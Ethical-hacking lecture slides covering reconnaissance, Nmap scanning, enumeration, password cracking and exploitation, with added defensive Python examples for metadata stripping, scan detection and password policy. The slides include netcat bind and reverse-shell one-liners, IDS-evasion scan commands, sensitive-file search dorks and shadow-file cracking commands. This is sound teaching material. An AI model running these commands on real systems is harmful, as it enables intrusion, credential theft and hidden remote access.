Dr. Igor Santos
Security of Information Systems
Ethical hacking
Contents
What is Ethical Hacking?
Phases:
Information Gathering
Network Mapping & Scanning
Password Attacks
Service Enumeration
Vulnerabilities Identification & Exploitation
What is Ethical Hacking?
Ethical Hacking
A method to evaluate the security of a system or a network of systems by simulating an intruder attack
It shows the actual impact of a vulnerability through controlled tests
It searches for unknown vulnerabilities
Ethical Hacking
Information level: White Box / Black Box
Social Engineering?
Physical Security?
Dangerous Tests? Exploits, DoS, …
Information Gathering
Information Gathering
Gather information about the target before the attack
Without (too much) contact
As much information as possible
The information can be very valuable in the future
More information = More probability of success in the attack
Information Gathering
Information we search for:
Names and/or positions of workers
E-mail addresses
User names
Public addresses, domains or URLs
Software and technologies used
Internal addresses or URLs
Internal paths
Data about the system configuration
Information Gathering
Client and supplier names
Physical location
Telephone number
…
Iterative process: when information is found, new searches are performed
Information Gathering
Sources:
Search engines
DNS servers
Whois servers
Metadata
Social networks
P2P networks
…
Information Gathering Types
Passive methods: the target is not contacted directly
▪ Search engines
▪ Whois
▪ …
Active methods: they leave some trace on the target
▪ DNS zone transfer
▪ Web site mirroring
▪ …
Information Gathering Techniques
Internet service registration (whois): information about the IP record and its maintenance
Search engines: gather public information from the company's and workers' web sites
Information Gathering Techniques
DNS queries: identification of hosts by DNS querying
Web site analysis: intentionally published information that may nevertheless pose a security risk
Information Gathering Techniques
New sources!!!
Social networks
Metadata
P2P networks
Job search websites
Search Engines - Google
Google Hacking: searching Google for sensitive information, usually with malicious goals
Johnny Long, Google Hacking For Penetration Testers
http://www.hackersforcharity.org/ghdb/
▪ Not maintained
http://www.exploit-db.com/google-dorks/
▪ Its continuation!!! (9 Nov. 2010)
Cheat sheet: http://www.sans.org/mentor/GoogleCheatSheet.pdf
Search Engines - Google
What to look for?
Vulnerable applications (e.g., inurl:eStore/index.cgi?)
Error messages (e.g., "Warning: mysql_query()" "invalid query")
Files with sensitive information (e.g., filetype:sql "insert into")
Websites with private reports (e.g., intitle:"Nessus Scan Report")
Web server versions (e.g., "Microsoft-IIS/* server at", intitle:index.of)
Search Engines - Shodan
http://www.shodanhq.com/
A "different" search engine: it finds systems by performing searches based on their banner responses
▪ A computer search engine
Filters: http://www.shodanhq.com/help/filters
Examples:
▪ net:130.206.139.0/24
▪ port:22 country:ES
Search Engines - Netcraft
Netcraft (http://news.netcraft.com) shows the following information for a given domain:
▪ OS version
▪ Web server version
▪ Uptime
Search Engines
Countermeasures
Properly configure the "robots.txt" file
▪ This file tells search engines what they must NOT index (it is a request honoured by well-behaved crawlers, not an access control, so it cannot be the only protection for a sensitive path)
Periodically audit the web site with these same techniques in order to check that there is no access to sensitive information
Social Networks
Who has a profile on Facebook or LinkedIn?
Do we know how to handle privacy in social networks?
Social Engineering: create a fake profile in order to obtain access to private profiles = lots of information!
Social network search engines
▪ http://www.123people.com/
▪ http://www.pipl.com/
Social Networks
Countermeasures
Limit the presence in social networks
Don't publish too much
Don't publish automatically
Don't accept every friendship request (we may not be the final victim but an attack vector)
Metadata
Hidden information regarding a document:
Author
Application used
Date of creation
Camera model (images)
E-mail addresses
…
They enhance the information present in a document
Metadata - FOCA
A tool that started as a metadata extractor and analyzer and is now more than that:
Document panel: searches for several types of documents in Google, Bing and Exalead
DNS Search panel: uses different techniques to obtain more domain names
Countermeasure: Metashield Protector cleans the metadata from documents
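Both halves of this slide, extraction (what FOCA reports) and cleaning (what Metashield Protector does), shown on a constructed minimal OOXML (.docx-style) package. This is an added example, not the deck's code nor either tool's; the sample document, the list of properties treated as sensitive and the blank-in-place strategy are assumptions of the example.

```python
"""Audit and strip identifying metadata from an OOXML (.docx-style) package (added example)."""
import io
import zipfile
import xml.etree.ElementTree as ET

CP_NS = "http://schemas.openxmlformats.org/package/2006/metadata/core-properties"
DC_NS = "http://purl.org/dc/elements/1.1/"
DCTERMS_NS = "http://purl.org/dc/terms/"
EXT_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"
for _prefix, _uri in (("cp", CP_NS), ("dc", DC_NS), ("dcterms", DCTERMS_NS)):
    ET.register_namespace(_prefix, _uri)   # keep the usual prefixes when rewriting

# Properties that identify people, the organisation or the software used (assumed list;
# the slides name author, application used and e-mail addresses as the interesting ones).
SENSITIVE = {"creator", "lastModifiedBy", "Company", "Manager", "Application", "AppVersion"}

# Constructed sample metadata parts (not taken from a real document).
CORE_XML = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<cp:coreProperties xmlns:cp="{CP_NS}" xmlns:dc="{DC_NS}" xmlns:dcterms="{DCTERMS_NS}"
 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <dc:title>Quarterly report</dc:title>
  <dc:creator>jdoe</dc:creator>
  <cp:lastModifiedBy>Jane Doe</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-11-09T10:00:00Z</dcterms:created>
</cp:coreProperties>"""
APP_XML = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Properties xmlns="{EXT_NS}">
  <Application>Microsoft Office Word</Application>
  <Company>Example Corp</Company>
  <AppVersion>12.0000</AppVersion>
</Properties>"""


def build_sample_docx() -> bytes:
    """Minimal .docx-like zip: the two metadata parts plus placeholder content parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types/>')
        zf.writestr("docProps/core.xml", CORE_XML)
        zf.writestr("docProps/app.xml", APP_XML)
        zf.writestr("word/document.xml", '<?xml version="1.0"?><document/>')
    return buf.getvalue()


def _is_metadata_part(name: str) -> bool:
    return name.startswith("docProps/") and name.endswith(".xml")


def _local(tag: str) -> str:
    """Strip the {namespace} prefix ElementTree puts on tag names."""
    return tag.rsplit("}", 1)[-1]


def extract_metadata(doc: bytes) -> dict:
    """What a metadata extractor would report: every leaf property that has a value."""
    found = {}
    with zipfile.ZipFile(io.BytesIO(doc)) as zf:
        for name in filter(_is_metadata_part, zf.namelist()):
            for el in ET.fromstring(zf.read(name)).iter():
                if len(el) == 0 and el.text and el.text.strip():
                    found[_local(el.tag)] = el.text.strip()
    return found


def strip_metadata(doc: bytes) -> bytes:
    """Return a copy of the package with the SENSITIVE properties blanked.

    Non-metadata parts are copied byte for byte; the XML structure of the metadata
    parts is kept so the document still opens, only the values are emptied.
    """
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(doc)) as zin, \
         zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as zout:
        for item in zin.infolist():
            data = zin.read(item.filename)
            if _is_metadata_part(item.filename):
                root = ET.fromstring(data)
                for el in root.iter():
                    if _local(el.tag) in SENSITIVE:
                        el.text = ""
                data = ET.tostring(root, encoding="utf-8", xml_declaration=True)
            zout.writestr(item.filename, data)
    return out.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx()
    print("before:", extract_metadata(sample))
    print("after: ", extract_metadata(strip_metadata(sample)))
```

Running the audit on every document before it is published, rather than only on request, is what turns this into a countermeasure.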
Network Mapping & Scanning
Network Mapping & Scanning
Several techniques:
Host discovery
Port scanning
IDS (Intrusion Detection System) evasion
Service and OS identification (fingerprinting)
Network Mapping & Scanning - Nmap
Tool for network exploration and security auditing
nmap [<Scan Type>...] [<Options>] {<target specification>}
Options
▪ Scan type: -sS, -sX, -sU, …
▪ -p <ports>: ports to scan (separated by commas, or with "-" for a range; to scan all of them, -p 0-65535)
Network Mapping & Scanning
Zenmap: front-end for nmap
It draws a network map with the results
Predefined scans
Network Mapping & Scanning
Manual: http://nmap.org/man/es/man-briefoptions.html
Cheat sheet: http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf
Book: http://nmap.org/book/
Host Discovery
Identify online systems: the first step of network mapping
Classic method using ping: ICMP echo request; alive systems respond with an ICMP echo reply
It is also possible to send TCP packets and wait for the responses of the online hosts
ARP ping in local networks
Host Discovery
Nmap ping (-sP):
ICMP echo request & ICMP timestamp request
TCP ACK packet to port 80
TCP SYN packet to port 443
Example: nmap -sP 192.168.1.1
Port Scanning
One of the most widespread hacking techniques
Nmap in Hollywood: http://nmap.org/movies.html
A computer runs several services that listen on TCP/UDP ports
By means of scanning, we can locate open ports
TCP Port Scanning - TCP Connect scan
TCP Connect scan: a TCP connection is established with the destination port (three-way handshake)
A very reliable method to determine the port state
Simple and easy to detect
▪ Generates too much noise
nmap -sT <IP> -p <ports>
TCP Port Scanning - TCP Connect scan
Open port
TCP Port Scanning - TCP Connect scan
Closed port
TCP Port Scanning - TCP Connect scan
Filtered port
TCP Port Scanning - SYN Scan
SYN scan: if a listening port is found, the full connection is not established
▪ An RST is sent to tear it down
Because the three-way handshake is not completed, many systems do not log the connection attempt
An IDS can easily detect it
Quick and reliable
nmap -sS <IP> -p <ports>
TCP Port Scanning - SYN Scan
Open port
TCP Port Scanning - SYN Scan
Closed port
TCP Port Scanning - SYN Scan
Filtered port
UDP Port Scanning
UDP is a connectionless protocol
Closed ports answer with an "ICMP destination unreachable" packet
If ICMP traffic is filtered, no response is received for closed ports, so the port state cannot be determined conclusively
nmap -sU <IP> -p <ports>
UDP Port Scanning
Open/Filtered port
UDP Port Scanning
Closed port
IDS evasion
Techniques to avoid IDS/IPS
Use of fragmented packets
▪ An IP packet is split across several smaller fragments
nmap -sS -f <IP> -p <ports>
Spoofing of source IPs to emulate multiple attackers
▪ Hides our own IP (the attacker's) among the decoys
nmap -sS -D <IP1,IP2,…,IPN> <attacked_IP> -p <ports>
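A defender-side view of the scan types on the preceding slides (connect, SYN, UDP and the -D decoys), as an added example that is not part of the deck or of Nmap: it parses iptables-style LOG lines and flags bare SYNs to many ports with no completed handshake (SYN scan), the same with completed handshakes (connect scan), UDP probes to many ports, and several source addresses sending identical probe sets, which is what decoy scanning looks like from the target. The sample lines are constructed, and the log format, the assumption that every inbound packet is logged (not only new connections) and the port threshold are this example's own.

```python
"""Flag port-scan patterns in iptables-style firewall logs (added example)."""
import re
from collections import defaultdict

# Fields we need from an iptables LOG line; the trailing group holds the TCP flag tokens.
LINE_RE = re.compile(
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>TCP|UDP) .*?DPT=(?P<dpt>\d+)(?P<rest>.*)$"
)
TCP_FLAGS = {"SYN", "ACK", "RST", "FIN"}


def parse_line(line):
    """Return {src, proto, dpt, flags} for one log line, or None if it does not match."""
    m = LINE_RE.search(line)
    if not m:
        return None
    flags = {tok for tok in m["rest"].split() if tok in TCP_FLAGS}
    return {"src": m["src"], "proto": m["proto"], "dpt": int(m["dpt"]), "flags": flags}


def _synth(src, proto, ports, flags=""):
    """Constructed sample lines in iptables LOG format (not real traffic)."""
    return [
        f"Nov  9 10:00:00 gw kernel: IN=eth0 OUT= SRC={src} DST=192.168.1.10 "
        f"PROTO={proto} SPT=40000 DPT={p} {flags}".rstrip()
        for p in ports
    ]


PROBED = [21, 22, 23, 80, 443]            # ports the real scanner and every decoy hit
SAMPLE_LOG = (
    _synth("10.0.0.5", "TCP", PROBED, "SYN")           # nmap -sS: bare SYNs, no handshake
    + _synth("203.0.113.9", "TCP", PROBED, "SYN")      # nmap -D decoys send the same probes
    + _synth("203.0.113.10", "TCP", PROBED, "SYN")
    + _synth("10.0.0.7", "TCP", [25, 110, 143, 993, 995], "SYN")   # nmap -sT: SYN ...
    + _synth("10.0.0.7", "TCP", [25, 110, 143, 993, 995], "ACK")   # ... then the final ACK
    + _synth("10.0.0.8", "UDP", [53, 69, 123, 161, 500])           # nmap -sU
    + _synth("10.0.0.20", "TCP", [443], "SYN")         # an ordinary HTTPS client
    + _synth("10.0.0.20", "TCP", [443], "ACK")
)


def _aggregate(lines):
    """Per source: ports hit with a bare SYN, UDP ports hit, and whether a handshake completed."""
    syn_ports, udp_ports, completed = defaultdict(set), defaultdict(set), set()
    for rec in filter(None, map(parse_line, lines)):
        if rec["proto"] == "UDP":
            udp_ports[rec["src"]].add(rec["dpt"])
        elif rec["flags"] == {"SYN"}:        # first packet of a handshake
            syn_ports[rec["src"]].add(rec["dpt"])
        elif "ACK" in rec["flags"]:          # third packet: the connection was completed
            completed.add(rec["src"])
    return syn_ports, udp_ports, completed


def classify_sources(lines, threshold=4):
    """Map each source that probed >= threshold distinct ports to a scan verdict."""
    syn_ports, udp_ports, completed = _aggregate(lines)
    verdicts = {}
    for src, ports in syn_ports.items():
        if len(ports) >= threshold:
            # A connect scan completes the handshake, so the service itself logs it;
            # a SYN scan never sends the final ACK, which is why many systems miss it.
            verdicts[src] = "connect_scan" if src in completed else "syn_scan"
    for src, ports in udp_ports.items():
        if len(ports) >= threshold:
            verdicts[src] = "udp_scan"
    return verdicts


def decoy_groups(lines, threshold=4):
    """Sources that never completed a handshake and probed exactly the same port set:
    what nmap -D decoys look like from the target, with the real scanner among them."""
    syn_ports, _, completed = _aggregate(lines)
    by_set = defaultdict(set)
    for src, ports in syn_ports.items():
        if len(ports) >= threshold and src not in completed:
            by_set[frozenset(ports)].add(src)
    return [sorted(group) for group in by_set.values() if len(group) > 1]


if __name__ == "__main__":
    for src, verdict in sorted(classify_sources(SAMPLE_LOG).items()):
        print(f"{src:15} {verdict}")
    print("decoy groups:", decoy_groups(SAMPLE_LOG))
```

The decoy grouping cannot tell which member is the real scanner; it only shows that the set of "attackers" should be treated as one event.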
Fingerprinting
Service fingerprinting: identification of the service listening on a TCP/UDP port
nmap -sV <IP> -p <port>
O.S. fingerprinting: identification of the operating system
nmap -O <IP>
Network scanning countermeasures
Disable unnecessary services
Close ports
Firewall / IDS / IPS
ICMP traffic filtering
Enumeration
Enumeration
Get information through a network service
What information?
System user names
Email addresses
Other systems
...
Enumeration
Services:
FTP: anonymous login / ftp-user-enum
TFTP: without authentication!
SMTP: VRFY and EXPN commands → smtpenum
DNS: direct/reverse lookup and zone transfer
HTTP: banner grabbing
RPC: edump, rpcdump, rpcinfo
NETBIOS: samrdump
SNMP: snmpwalk, snmpcheck
LDAP: brute force by means of the Guest user
Countermeasures - enumeration
Keep the services updated
Disable unnecessary services
Password Attacks
Password Guessing
Some or all of the data needed to authenticate is unknown
User: if the Information Gathering phase has been done correctly, we will have several system users
Password: the password file is known, but it is encrypted; words are tested until the correct one is found
Password Guessing
Systems store a password hash: they do not store users' passwords in clear
One-way function: it cannot be decrypted
▪ http://en.wikipedia.org/wiki/Cryptographic_hash_function
Password Guessing
During a pentest we will collect password hashes, from bad configurations or after a successful intrusion
With administrative permissions it is possible to dump the password hashes of the system users
Windows -> SAM
Unix -> /etc/passwd, /etc/shadow
Attack Types
Dictionary: based on a list of user names or passwords
Common words
Terms related to the audited target
Try until the right one is found: it should be on the list!
Success depends on how good and/or extensive the dictionary is
/pentest/passwords/wordlists
Attack Types
Hybrid: uses a dictionary, but variations are also introduced
Examples:
Try dictionary words in lowercase and uppercase
A is replaced by 4, S by 5, E by 3, ...
Attack Types
Brute Force: user names or passwords are generated within a length range and for a given character set
▪ e.g., max 8 characters [A-Za-z]
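A policy-side counterpart to the three attack types above (dictionary, hybrid, brute force), as an added example that is not from the deck or from John the Ripper: it reproduces the hybrid rules the slides name (case changes, A->4 / S->5 / E->3, short suffixes) only to show that a registration check which normalizes those transformations back to the base word rejects every such variant, and it computes the brute-force keyspace for the slide's "max 8 characters [A-Za-z]" case. The mini wordlist and the extra O->0 / I->1 / @ / $ reverse mappings are assumptions of the example.

```python
"""Password policy check that anticipates dictionary, hybrid and brute-force attacks (added example)."""
import string
from itertools import product

# Constructed mini wordlist; a real check would load a full list such as the
# /pentest/passwords/wordlists files the slides mention.
WORDLIST = {"password", "welcome", "company", "summer", "football", "letmein"}

# Substitutions named on the slides (A->4, S->5, E->3).
LEET = {"a": "4", "s": "5", "e": "3"}
# Reverse map for normalisation; O->0, I->1, @ and $ are extra assumptions of this example.
UNLEET = str.maketrans({"4": "a", "5": "s", "3": "e", "0": "o", "1": "i", "@": "a", "$": "s"})
STRIPPABLE = string.digits + string.punctuation


def hybrid_variants(word: str) -> set:
    """Candidates a hybrid attack derives from one word with the slides' rules:
    case changes, leet substitutions (each alone and all together) and short suffixes."""
    cases = {word.lower(), word.upper(), word.capitalize()}
    subs = [{}] + [{k: v} for k, v in LEET.items()] + [LEET]
    suffixes = ["", "1", "123", "!"]
    variants = set()
    for base, sub, suffix in product(cases, subs, suffixes):
        variants.add("".join(sub.get(ch.lower(), ch) for ch in base) + suffix)
    return variants


def normalize(candidate: str) -> set:
    """Undo the mangling above: lowercase, map leet digits back, and also try with
    trailing digits/symbols removed. Returns every base form to test against the list."""
    lowered = candidate.lower()
    return {lowered.translate(UNLEET), lowered.rstrip(STRIPPABLE).translate(UNLEET)}


def keyspace(max_len: int, charset_size: int) -> int:
    """Candidates a brute-force attack must try for every length from 1 to max_len."""
    return sum(charset_size ** n for n in range(1, max_len + 1))


def check_password(pw: str, wordlist=WORDLIST, min_len: int = 12) -> list:
    """Reasons to reject a proposed password; an empty list means it passes."""
    reasons = []
    if len(pw) < min_len:
        reasons.append(f"shorter than {min_len} characters")
    hits = normalize(pw) & wordlist
    if hits:
        reasons.append(f"hybrid variant of dictionary word '{sorted(hits)[0]}'")
    return reasons


if __name__ == "__main__":
    # The slide's brute-force example: up to 8 characters from [A-Za-z].
    print("keyspace for max 8 chars [A-Za-z]:", keyspace(8, 52))
    for candidate in ("P455word1", "Summer2010!", "correct horse battery staple"):
        print(f"{candidate!r}: {check_password(candidate) or 'ok'}")
```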
John the Ripper
Password cracking tool able to break several algorithms:
DES, MD5, SHA-1, LM (LAN Manager), ...
You can save a session for later cracking
John the Ripper
Single mode: a quick test, but unlikely to succeed
It uses typical passwords and some variations
john --single <password_file>
John the Ripper
Wordlist mode: tests with a dictionary file; quick
Hybrid attack: --rules
john --wordlist=<dictionary> <password_file>
Dictionaries: /pentest/passwords/wordlists/
John the Ripper
Incremental mode: tries all possible password combinations (brute force)
▪ Only letters (--incremental:alpha)
▪ Only numbers (--incremental:digits)
▪ Letters, numbers and some special characters (--incremental:lanman)
▪ All characters (--incremental:all)
john --incremental:[mode] <password_file>
John the Ripper
Show cracked hashes:
john --show /etc/shadow
Other techniques
Shoulder surfing
Social Engineering
Sniffing: capture the session logins
Physical access
Bypass -> Kon-Boot
Password cracking: Ophcrack live CD (rainbow tables)
Vulnerabilities Identification & Exploitation
Vulnerabilities Identification & Exploitation
Terminology:
Vulnerability
Exploit (client-side, server-side, …)
0-day exploit
Payload
CVE (Common Vulnerabilities and Exposures): http://cve.mitre.org/
Vulnerabilities Identification & Exploitation
Lots of vulnerability types:
Configuration (not design)
Input validation
Directory traversal
Command injection
SQL injection
Cross-site scripting (XSS)
Buffer overflow
…
Vulnerabilities Identification & Exploitation
Vulnerability search
Security Focus
▪ http://www.securityfocus.com/vulnerabilities
National Vulnerability Database
▪ http://web.nvd.nist.gov/view/vuln/search
CERT
▪ http://cert.inteco.es/vulnSearch/Current_News/Vulnerabilities_1/vulnerability_search/?postAction=getVulns
Microsoft Security Bulletins
▪ http://www.microsoft.com/spain/technet/security/bulletin/ms10-oct.mspx
Scanners: Secunia, Nessus, etc.
Vulnerabilities Identification & Exploitation
Exploit search
Exploit Database
▪ Milw0rm continuation
▪ http://www.exploit-db.com/
Others
▪ http://www.securiteam.com/exploits
▪ http://securityvulns.com/exploits
▪ http://www.web-hack.ru/exploit
▪ http://tarantula.by.ru/localroot
Vulnerabilities Identification & Exploitation
Metasploit: framework for vulnerability exploitation
It helps in the development of new exploits
It allows you to define:
▪ Which exploit is going to be used
▪ Which payload is going to be launched
▪ Meterpreter: advanced payload without disk access (DLL injection) → less forensic evidence
▪ How it is going to be encoded (avoiding IDS, etc.)
Vulnerabilities Identification & Exploitation
Maintaining access - Backdoors
Tiny Shell: Unix backdoor
Hydrogen: backdoor from Immunitysec
▪ It includes robust encryption and traffic hiding
Radmin: Windows backdoor
▪ A remote-desktop-like connection. Very easy to use and with a lot of functions
Vulnerabilities Identification & Exploitation
Netcat: it can be used as a backdoor
▪ Victim (server): nc -lp 4444 -e cmd.exe
▪ Attacker (client): nc -vv <IP victim> 4444
▪ Also "reverse shell":
▪ Attacker (client): nc -vvlp 4444
▪ Victim (server): nc -vv <IP attacker> 4444 -e cmd.exe